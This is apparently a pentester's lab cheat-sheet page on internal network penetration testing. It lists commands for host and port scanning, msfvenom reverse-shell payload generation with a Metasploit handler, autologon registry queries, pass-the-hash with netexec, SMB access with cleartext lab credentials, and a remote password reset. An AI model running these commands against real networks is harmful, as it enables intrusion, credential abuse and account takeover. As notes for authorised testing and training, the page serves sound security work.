Internal Pentest

When inside the target network:

Start ligolo for pivoting.
Run nmap/fping scan to find live hosts.
Find open ports on the hosts.

# Scan for live hosts in the network
fping -g <subnet> | grep -v "unreachable" | awk '{print $1}'
nmap -sn -vv <subnet> -oN live_hosts

# Scan top 100 ports with slow speed to avoid issues in tunnel
nmap -F -iL live_hosts -T2 -vv -Pn -oN nmap_scan

Enumerate common services.
Start with trying to read SMB or NFS shares.
Spend time on HTTP websites if available, potentially get foothold on the host.

Found new creds???

Enumerate shares again.
Check the password on the users you dont know the password of.
Try to re-use it everywhere.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o shell.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp

autologon username: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName

netexec smb 172.16.8.20 -u 'Administrator' -H '0e20798f695ab0d04bc138b22344cea8' --local-auth

smbclient -U 'inlanefreight.local\hporter%Gr8hambino!' //172.16.8.3/SYSVOL

crackmapexec --users cat dusers | awk '{print $5}' | sort | uniq

net rpc password "ssmalls" 'Gr8hambino!' -U "inlanefreight.local"/"hporter"%'Gr8hambino!' -S "dc01.inlanefreight.local"

PreviousExternal Pentest NextReporting

Last updated 9 months ago

hashtagFound new creds???

Found new creds???